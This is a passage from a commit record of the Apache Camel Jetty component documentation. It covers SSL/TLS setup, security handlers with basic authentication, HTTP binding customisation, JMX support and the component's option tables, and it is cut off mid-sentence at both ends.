getContext().getComponent(\"jetty\", JettyComponent.class);\njettyComponent.setSslContextParameters(scp);\n----\n\n[[Jetty-SpringDSLbasedconfigurationofendpoint]]\nSpring DSL based configuration of endpoint\n\n[source,xml]\n----\n <camel:sslContextParameters\n id=\"sslContextParameters\">\n <camel:keyManagers\n keyPassword=\"keyPassword\">\n <camel:keyStore\n resource=\"\/users\/home\/server\/keystore.jks\"\n password=\"keystorePassword\"\/>\n <\/camel:keyManagers>\n <\/camel:sslContextParameters>\n\n <to uri=\"jetty:https:\/\/127.0.0.1\/mail\/?sslContextParameters=#sslContextParameters\"\/>\n\n----\n[[HTTP-Blueprintbasedconfigurationofendpoint]]\nBlueprint based configuration of endpoint\n\nGlobal configuration of sslContextParameters in a dedicated Blueprint XML file\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\">\n\n <sslContextParameters id=\"sslContextParameters\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <keyManagers keyPassword=\"keyPassword\">\n <keyStore resource=\"etc\/keystore.p12\" password=\"keystorePassword\"\/>\n <\/keyManagers>\n <\/sslContextParameters>\n\n <service 
ref=\"sslContextParameters\" auto-export=\"all-classes\"\/>\n<\/blueprint>\n----\n\nUse of the global configuration in other Blueprint XML files with route definitions\n\n[source,xml]\n----\n...\n<reference id=\"sslContextParameters\" interface=\"org.apache.camel.support.jsse.SSLContextParameters\" ext:proxy-method=\"classes\" \/>\n\n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route id=\"WEBISP001\">\n <from uri=\"jetty:https:\/\/0.0.0.0\/path?sslContextParameters=#sslContextParameters\"\/>\n...\n----\n\n[[Jetty-ConfiguringJettyDirectly]]\nConfiguring Jetty Directly\n\nJetty provides SSL support out of the box. To enable Jetty to run in SSL\nmode, simply format the URI with the `\\https:\/\/` prefix---for example:\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice\/\"\/>\n----\n\nJetty also needs to know where to load your keystore from and what\npasswords to use in order to load the correct SSL certificate. Set the\nfollowing JVM System Properties:\n\n* `org.eclipse.jetty.ssl.keystore` specifies the location of the Java\nkeystore file, which contains the Jetty server's own X.509 certificate\nin a _key entry_. A key entry stores the X.509 certificate (effectively,\nthe _public key_) and also its associated private key.\n* `org.eclipse.jetty.ssl.password` the store password, which is required\nto access the keystore file (this is the same password that is supplied\nto the `keystore` command's `-storepass` option).\n* `org.eclipse.jetty.ssl.keypassword` the key password, which is used to\naccess the certificate's key entry in the keystore (this is the same\npassword that is supplied to the `keystore` command's `-keypass`\noption).\n\nFor details of how to configure SSL on a Jetty endpoint, read the\nfollowing documentation at the Jetty Site:\nhttp:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL[http:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL]\n\nSome SSL properties aren't exposed directly by Camel, however Camel does\nexpose the underlying SslSocketConnector, which will allow you to set\nproperties like needClientAuth for mutual authentication requiring a\nclient certificate or wantClientAuth for mutual authentication where a\nclient doesn't need a certificate but can have one.\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectors\">\n <map>\n <entry key=\"8043\">\n <bean class=\"org.eclipse.jetty.server.ssl.SslSelectChannelConnector\">\n <property name=\"password\" value=\"...\"\/>\n <property name=\"keyPassword\" value=\"...\"\/>\n <property name=\"keystore\" value=\"...\"\/>\n <property name=\"needClientAuth\" value=\"...\"\/>\n <property name=\"truststore\" value=\"...\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThe value you use as keys in the above map is the port you configure\nJetty to listen on.\n\n=== Configuring general SSL properties\n\nInstead of a per port number specific SSL socket connector (as shown\nabove) you can now configure general properties which applies for all\nSSL socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectorProperties\">\n <map>\n <entry key=\"password\" value=\"...\"\/>\n <entry key=\"keyPassword\" value=\"...\"\/>\n <entry key=\"keystore\" value=\"...\"\/>\n <entry 
key=\"needClientAuth\" value=\"...\"\/>\n <entry key=\"truststore\" value=\"...\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== How to obtain reference to the X509Certificate\n\nJetty stores a reference to the certificate in the HttpServletRequest\nwhich you can access from code as follows:\n\n[source,java]\n----\nHttpServletRequest req = exchange.getIn().getBody(HttpServletRequest.class);\nX509Certificate cert = (X509Certificate) req.getAttribute(\"javax.servlet.request.X509Certificate\")\n----\n\n=== Configuring general HTTP properties\n\nInstead of a per port number specific HTTP socket connector (as shown\nabove) you can now configure general properties which applies for all\nHTTP socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectorProperties\">\n <map>\n <entry key=\"acceptors\" value=\"4\"\/>\n <entry key=\"maxIdleTime\" value=\"300000\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== Obtaining X-Forwarded-For header with HttpServletRequest.getRemoteAddr()\n\nIf the HTTP requests are handled by an Apache server and forwarded to\njetty with mod_proxy, the original client IP address is in the\nX-Forwarded-For header and the HttpServletRequest.getRemoteAddr() will\nreturn the address of the Apache proxy.\n\nJetty has a forwarded property which takes the value from\nX-Forwarded-For and places it in the HttpServletRequest remoteAddr\nproperty. This property is not available directly through the endpoint\nconfiguration but it can be easily added using the socketConnectors\nproperty:\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectors\">\n <map>\n <entry key=\"8080\">\n <bean class=\"org.eclipse.jetty.server.nio.SelectChannelConnector\">\n <property name=\"forwarded\" value=\"true\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThis is particularly useful when an existing Apache server handles TLS\nconnections for a domain and proxies them to application servers\ninternally.\n\n== Default behavior for returning HTTP status codes\n\nThe default behavior of HTTP status codes is defined by the\n`org.apache.camel.component.http.DefaultHttpBinding` class, which\nhandles how a response is written and also sets the HTTP status code.\n\nIf the exchange was processed successfully, the 200 HTTP status code is\nreturned. +\n If the exchange failed with an exception, the 500 HTTP status code is\nreturned, and the stacktrace is returned in the body. If you want to\nspecify which HTTP status code to return, set the code in the\n`Exchange.HTTP_RESPONSE_CODE` header of the OUT message.\n\n== Customizing HttpBinding\n\nBy default, Camel uses the\n`org.apache.camel.component.http.DefaultHttpBinding` to handle how a\nresponse is written. 
If you like, you can customize this behavior either\nby implementing your own `HttpBinding` class or by extending\n`DefaultHttpBinding` and overriding the appropriate methods.\n\nThe following example shows how to customize the `DefaultHttpBinding` in\norder to change how exceptions are returned:\n\nWe can then create an instance of our binding and register it in the\nSpring registry as follows:\n\n[source,xml]\n----\n<bean id=\"mybinding\" class=\"com.mycompany.MyHttpBinding\"\/>\n----\n\nAnd then we can reference this binding when we define the route:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice?httpBindingRef=mybinding\"\/>\n <to uri=\"bean:doSomething\"\/>\n<\/route>\n----\n\n== Jetty handlers and security configuration\n\nYou can configure a list of Jetty handlers on the endpoint, which can be\nuseful for enabling advanced Jetty security features. These handlers are\nconfigured in Spring XML as follows:\n\n[source,xml]\n----\n<bean id=\"userRealm\" class=\"org.mortbay.jetty.plus.jaas.JAASUserRealm\">\n <property name=\"name\" value=\"tracker-users\"\/>\n <property name=\"loginModuleName\" value=\"ldaploginmodule\"\/>\n<\/bean>\n\n<bean id=\"constraint\" class=\"org.mortbay.jetty.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.mortbay.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.mortbay.jetty.security.SecurityHandler\">\n <property name=\"userRealm\" ref=\"userRealm\"\/>\n <property name=\"constraintMappings\" ref=\"constraintMapping\"\/>\n<\/bean>\n----\n\nYou can configure a list of Jetty handlers as follows:\n\n[source,xml]\n----\n<bean id=\"constraint\" class=\"org.eclipse.jetty.http.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref bean=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n<\/bean>\n----\n\nYou can then define the endpoint as:\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:9080\/myservice?handlers=securityHandler\")\n----\n\nIf you need more handlers, set the `handlers` option equal to a\ncomma-separated list of bean IDs.\n\nBlueprint based definition of basic authentication (based on Jetty 9):\n\n[source,xml]\n----\n<blueprint xmlns=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0 https:\/\/www.osgi.org\/xmlns\/blueprint\/v1.0.0\/blueprint.xsd\"\n xmlns:ext=\"http:\/\/aries.apache.org\/blueprint\/xmlns\/blueprint-ext\/v1.0.0\">\n\n <bean id=\"constraint\" class=\"org.eclipse.jetty.util.security.Constraint\">\n <property name=\"name\" 
value=\"BASIC\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n <property name=\"roles\">\n <list>\n <value>rolename1<\/value>\n <\/list>\n <\/property>\n <\/bean>\n\n <bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/path\"\/>\n <\/bean>\n\n <bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"loginService\">\n <bean class=\"org.eclipse.jetty.security.HashLoginService\">\n <property name=\"config\" value=\"\/opt\/apache-karaf\/etc\/roles.properties\"\/>\n <property name=\"hotReload\" value=\"true\"\/>\n <\/bean>\n <\/property>\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref component-id=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n <\/bean>\n \n <camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n\n <route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/path?handlers=securityHandler\"\/>\n...\n----\n\nThe roles.properties files contains\n\n[source,text]\n----\nusername1=password1,rolename1\nusername2=password2,rolename1\n----\n\nThis file is located in the etc folder and will be reloaded when changed. The endpoint\n\n[source,text]\n----\nhttp:\/\/0.0.0.0\/path\n----\n\nis now secured with basic authentication, only username1 with password1 and username2 with password2 are able to access the endpoint.\n\n== How to return a custom HTTP 500 reply message\n\nYou may want to return a custom reply message when something goes wrong,\ninstead of the default reply message Camel xref:jetty-component.adoc[Jetty]\nreplies with. +\n You could use a custom `HttpBinding` to be in control of the message\nmapping, but often it may be easier to use Camel's\nException Clause to construct the custom\nreply message. For example as show here, where we return\n`Dude something went wrong` with HTTP error code 500:\n\n== Multi-part Form support\n\nThe camel-jetty component supports multipart form post out of box.\nThe submitted form-data are mapped into the message header. Camel-jetty\ncreates an attachment for each uploaded file. The file name is mapped to\nthe name of the attachment. The content type is set as the content type\nof the attachment file name. You can find the example here.\n\n== Jetty JMX support\n\nThe camel-jetty component supports the enabling of Jetty's JMX\ncapabilities at the component and endpoint level with the endpoint\nconfiguration taking priority. Note that JMX must be enabled within the\nCamel context in order to enable JMX support in this component as the\ncomponent provides Jetty with a reference to the MBeanServer registered\nwith the Camel context. Because the camel-jetty component caches and\nreuses Jetty resources for a given protocol\/host\/port pairing, this\nconfiguration option will only be evaluated during the creation of the\nfirst endpoint to use a protocol\/host\/port pairing. 
For example, given\ntwo routes created from the following XML fragments, JMX support would\nremain enabled for all endpoints listening on \"https:\/\/0.0.0.0\".\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice1\/?enableJmx=true\"\/>\n----\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice2\/?enableJmx=false\"\/>\n----\n\nThe camel-jetty component also provides for direct configuration of the\nJetty MBeanContainer. Jetty creates MBean names dynamically. If you are\nrunning another instance of Jetty outside of the Camel context and\nsharing the same MBeanServer between the instances, you can provide both\ninstances with a reference to the same MBeanContainer in order to avoid\nname collisions when registering Jetty MBeans.\n\ninclude::camel-spring-boot::page$jetty-starter.adoc[]\n","old_contents":"[[jetty-component]]\n= Jetty Component\n:page-source: components\/camel-jetty\/src\/main\/docs\/jetty-component.adoc\n\n*Since Camel 1.2*\n\n\/\/ HEADER START\n*Only consumer is supported*\n\/\/ HEADER END\n\nThe Jetty component provides HTTP-based endpoints\nfor consuming and producing HTTP requests. That is, the Jetty component\nbehaves as a simple Web server.\n\n*Stream*\n\nThe `assert` call appears in this example, because the code is part of\nan unit test.Jetty is stream based, which means the input it receives is\nsubmitted to Camel as a stream. That means you will only be able to read\nthe content of the stream *once*. +\nIf you find a situation where the message body appears to be empty or\nyou need to access the Exchange.HTTP_RESPONSE_CODE data multiple times\n(e.g.: doing multicasting, or redelivery error handling), you should use\nStream caching or convert the message body to\na `String` which is safe to be re-read multiple times.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-jetty<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source,text]\n----\njetty:http:\/\/hostname[:port][\/resourceUri][?options]\n----\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\n\n\n\n\/\/ component options: START\nThe Jetty component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. 
| false | boolean\n| *maxThreads* (consumer) | To set a value for maximum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *minThreads* (consumer) | To set a value for minimum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *requestBufferSize* (consumer) | Allows to configure a custom value of the request buffer size on the Jetty connectors. | | Integer\n| *requestHeaderSize* (consumer) | Allows to configure a custom value of the request header size on the Jetty connectors. | | Integer\n| *responseBufferSize* (consumer) | Allows to configure a custom value of the response buffer size on the Jetty connectors. | | Integer\n| *responseHeaderSize* (consumer) | Allows to configure a custom value of the response header size on the Jetty connectors. | | Integer\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | true | boolean\n| *useXForwardedForHeader* (consumer) | To use the X-Forwarded-For header in HttpServletRequest.getRemoteAddr. | false | boolean\n| *threadPool* (consumer) | To use a custom thread pool for the server. This option should only be used in special circumstances. | | ThreadPool\n| *allowJavaSerializedObject* (advanced) | Whether to allow java serialization when a request uses context-type=application\/x-java-serialized-object. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *errorHandler* (advanced) | This option is used to set the ErrorHandler that Jetty server uses. | | ErrorHandler\n| *httpBinding* (advanced) | Not to be used - use JettyHttpBinding instead. | | HttpBinding\n| *httpConfiguration* (advanced) | Jetty component does not use HttpConfiguration. | | HttpConfiguration\n| *jettyHttpBinding* (advanced) | To use a custom org.apache.camel.component.jetty.JettyHttpBinding, which are used to customize how a response should be written for the producer. | | JettyHttpBinding\n| *mbContainer* (advanced) | To use a existing configured org.eclipse.jetty.jmx.MBeanContainer if JMX is enabled that Jetty uses for registering mbeans. | | MBeanContainer\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *proxyHost* (proxy) | To use a http proxy to configure the hostname. | | String\n| *proxyPort* (proxy) | To use a http proxy to configure the port number. | | Integer\n| *keystore* (security) | Specifies the location of the Java keystore file, which contains the Jetty server's own X.509 certificate in a key entry. | | String\n| *socketConnectorProperties* (security) | A map which contains general HTTP connector properties. Uses the same principle as sslSocketConnectorProperties. 
| | Map\n| *socketConnectors* (security) | A map which contains per port number specific HTTP connectors. Uses the same principle as sslSocketConnectors. | | Map\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n| *sslKeyPassword* (security) | The key password, which is used to access the certificate's key entry in the keystore (this is the same password that is supplied to the keystore command's -keypass option). | | String\n| *sslPassword* (security) | The ssl password, which is required to access the keystore file (this is the same password that is supplied to the keystore command's -storepass option). | | String\n| *sslSocketConnectorProperties* (security) | A map which contains general SSL connector properties. | | Map\n| *sslSocketConnectors* (security) | A map which contains per port number specific SSL connectors. | | Map\n| *useGlobalSslContextParameters* (security) | Enable usage of global SSL context parameters | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe Jetty endpoint is configured using URI syntax:\n\n----\njetty:httpUri\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *httpUri* | *Required* The url of the HTTP endpoint to call. | | URI\n|===\n\n\n=== Query Parameters (34 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *disableStreamCache* (common) | Determines whether or not the raw input stream from Servlet is cached or not (Camel will read the stream into a in memory\/overflow to file, Stream caching) cache. By default Camel will cache the Servlet input stream to support reading it multiple times to ensure it Camel can retrieve all data from the stream. However you can set this option to true when you for example need to access the raw stream, such as streaming it directly to a file or other persistent store. DefaultHttpBinding will copy the request input stream into a stream cache and put it into message body if this option is false to support reading the stream multiple times. If you use Servlet to bridge\/proxy an endpoint then consider enabling this option to improve performance, in case you do not need to read the message payload multiple times. The http producer will by default cache the response body stream. If setting this option to true, then the producers will not cache the response body stream but use the response stream as-is as the message body. | false | boolean\n| *headerFilterStrategy* (common) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *httpBinding* (common) | To use a custom HttpBinding to control the mapping between Camel message and HttpClient. | | HttpBinding\n| *async* (consumer) | Configure the consumer to work in async mode | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. 
| false | boolean\n| *chunked* (consumer) | If this option is false the Servlet will disable the HTTP streaming and set the content-length header on the response | true | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableCORS* (consumer) | If the option is true, Jetty server will setup the CrossOriginFilter which supports the CORS out of box. | false | boolean\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. See Jetty JMX support for more details. | false | boolean\n| *enableMultipartFilter* (consumer) | Whether org.apache.camel.component.jetty.MultiPartFilter is enabled or not. You should set this value to false when bridging endpoints, to ensure multipart requests is proxied\/bridged as well. | false | boolean\n| *httpMethodRestrict* (consumer) | Used to only allow consuming if the HttpMethod matches, such as GET\/POST\/PUT etc. Multiple methods can be specified separated by comma. | | String\n| *matchOnUriPrefix* (consumer) | Whether or not the consumer should try to find a target consumer by matching the URI prefix if no exact match is found. | false | boolean\n| *muteException* (consumer) | If enabled and an Exchange failed processing on the consumer side the response's body won't contain the exception's stack trace. | false | boolean\n| *responseBufferSize* (consumer) | To use a custom buffer size on the javax.servlet.ServletResponse. | | Integer\n| *sendDateHeader* (consumer) | If the option is true, jetty server will send the date header to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | false | boolean\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *sessionSupport* (consumer) | Specifies whether to enable the session manager on the server side of Jetty. | false | boolean\n| *transferException* (consumer) | If enabled and an Exchange failed processing on the consumer side, and if the caused Exception was send back serialized in the response as a application\/x-java-serialized-object content type. On the producer side the exception will be deserialized and thrown as is, instead of the HttpOperationFailedException. The caused exception is required to be serialized. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | | Boolean\n| *eagerCheckContentAvailable* (consumer) | Whether to eager check whether the HTTP requests has content if the content-length header is 0 or not present. This can be turned on in case HTTP clients do not send streamed data. 
| false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *filterInitParameters* (consumer) | Configuration of the filter init parameters. These parameters will be applied to the filter list before starting the jetty server. | | Map\n| *filters* (consumer) | Allows using a custom filters which is putted into a list and can be find in the Registry. Multiple values can be separated by comma. | | List\n| *handlers* (consumer) | Specifies a comma-delimited set of Handler instances to lookup in your Registry. These handlers are added to the Jetty servlet context (for example, to add security). Important: You can not use different handlers with different Jetty endpoints using the same port number. The handlers is associated to the port number. If you need different handlers, then use different port numbers. | | List\n| *multipartFilter* (consumer) | Allows using a custom multipart filter. Note: setting multipartFilterRef forces the value of enableMultipartFilter to true. | | Filter\n| *optionsEnabled* (consumer) | Specifies whether to enable HTTP OPTIONS for this Servlet consumer. By default OPTIONS is turned off. | false | boolean\n| *traceEnabled* (consumer) | Specifies whether to enable HTTP TRACE for this Servlet consumer. By default TRACE is turned off. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *mapHttpMessageBody* (advanced) | If this option is true then IN exchange Body of the exchange will be mapped to HTTP body. Setting this to false will avoid the HTTP mapping. | true | boolean\n| *mapHttpMessageFormUrlEncoded Body* (advanced) | If this option is true then IN exchange Form Encoded body of the exchange will be mapped to HTTP. Setting this to false will avoid the HTTP Form Encoded body mapping. | true | boolean\n| *mapHttpMessageHeaders* (advanced) | If this option is true then IN exchange Headers of the exchange will be mapped to HTTP headers. Setting this to false will avoid the HTTP Headers mapping. | true | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n|===\n\/\/ endpoint options: END\n\n\n\n\n== Message Headers\n\nCamel uses the same message headers as the xref:http-component.adoc[HTTP]\ncomponent.\nIt also uses (Exchange.HTTP_CHUNKED,CamelHttpChunked)\nheader to turn on or turn off the chuched encoding on the camel-jetty\nconsumer.\n\nCamel also populates *all* request.parameter and request.headers. 
For\nexample, given a client request with the URL,\n`\\http:\/\/myserver\/myserver?orderid=123`, the exchange will contain a\nheader named `orderid` with the value 123.\n\nYou can get the request.parameter from the\nmessage header not only from Get Method, but also other HTTP method.\n\n== Usage\n\nThe Jetty component supports consumer endpoints.\n\n== Consumer Example\n\nIn this sample we define a route that exposes a HTTP service at\n`\\http:\/\/localhost:8080\/myapp\/myservice`:\n\n*Usage of localhost*\n\nWhen you specify `localhost` in a URL, Camel exposes the endpoint only\non the local TCP\/IP network interface, so it cannot be accessed from\noutside the machine it operates on.\n\nIf you need to expose a Jetty endpoint on a specific network interface,\nthe numerical IP address of this interface should be used as the host.\nIf you need to expose a Jetty endpoint on all network interfaces, the\n`0.0.0.0` address should be used.\n\nTo listen across an entire URI prefix, see\nxref:manual:faq:how-do-i-let-jetty-match-wildcards.adoc[How do I let Jetty match wildcards].\n\nIf you actually want to expose routes by HTTP and already have a\nServlet, you should instead refer to the\nxref:servlet-component.adoc[Servlet Transport].\n\nOur business logic is implemented in the `MyBookService` class, which\naccesses the HTTP request contents and then returns a response. +\n *Note:* The `assert` call appears in this example, because the code is\npart of an unit test.\n\nThe following sample shows a content-based route that routes all\nrequests containing the URI parameter, `one`, to the endpoint,\n`mock:one`, and all others to `mock:other`.\n\nSo if a client sends the HTTP request, `\\http:\/\/serverUri?one=hello`, the\nJetty component will copy the HTTP request parameter, `one` to the\nexchange's `in.header`. We can then use the `simple` language to route\nexchanges that contain this header to a specific endpoint and all others\nto another. If we used a language more powerful than\nxref:languages:simple-language.adoc[Simple] (such as xref:languages:ognl-language.adoc[OGNL])\nwe could also test for the parameter value and do routing based on the\nheader value as well.\n\n== Session Support\n\nThe session support option, `sessionSupport`, can be used to enable a\n`HttpSession` object and access the session object while processing the\nexchange. For example, the following route enables sessions:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/myapp\/myservice\/?sessionSupport=true\"\/>\n <processRef ref=\"myCode\"\/>\n<\/route>\n----\n\nThe `myCode` Processor can be instantiated by a\nSpring `bean` element:\n\n[source,xml]\n----\n<bean id=\"myCode\" class=\"com.mycompany.MyCodeProcessor\"\/>\n----\n\nWhere the processor implementation can access the `HttpSession` as\nfollows:\n\n[source,java]\n----\npublic void process(Exchange exchange) throws Exception {\n HttpSession session = exchange.getIn(HttpMessage.class).getRequest().getSession();\n ...\n}\n----\n\n== SSL Support (HTTPS)\n\n[[Jetty-UsingtheJSSEConfigurationUtility]]\nUsing the JSSE Configuration Utility\n\nThe Jetty component supports SSL\/TLS configuration\nthrough the xref:manual::camel-configuration-utilities.adoc[Camel JSSE\nConfiguration Utility]. This utility greatly decreases the amount of\ncomponent specific code you need to write and is configurable at the\nendpoint and component levels. 
The following examples demonstrate how\nto use the utility with the Jetty component.\n\n[[Jetty-Programmaticconfigurationofthecomponent]]\nProgrammatic configuration of the component\n\n[source,java]\n----\nKeyStoreParameters ksp = new KeyStoreParameters();\nksp.setResource(\"\/users\/home\/server\/keystore.jks\");\nksp.setPassword(\"keystorePassword\");\n\nKeyManagersParameters kmp = new KeyManagersParameters();\nkmp.setKeyStore(ksp);\nkmp.setKeyPassword(\"keyPassword\");\n\nSSLContextParameters scp = new SSLContextParameters();\nscp.setKeyManagers(kmp);\n\nJettyComponent jettyComponent = getContext().getComponent(\"jetty\", JettyComponent.class);\njettyComponent.setSslContextParameters(scp);\n----\n\n[[Jetty-SpringDSLbasedconfigurationofendpoint]]\nSpring DSL based configuration of endpoint\n\n[source,xml]\n----\n <camel:sslContextParameters\n id=\"sslContextParameters\">\n <camel:keyManagers\n keyPassword=\"keyPassword\">\n <camel:keyStore\n resource=\"\/users\/home\/server\/keystore.jks\"\n password=\"keystorePassword\"\/>\n <\/camel:keyManagers>\n <\/camel:sslContextParameters>\n\n <to uri=\"jetty:https:\/\/127.0.0.1\/mail\/?sslContextParameters=#sslContextParameters\"\/>\n\n----\n\n[[Jetty-ConfiguringJettyDirectly]]\nConfiguring Jetty Directly\n\nJetty provides SSL support out of the box. To enable Jetty to run in SSL\nmode, simply format the URI with the 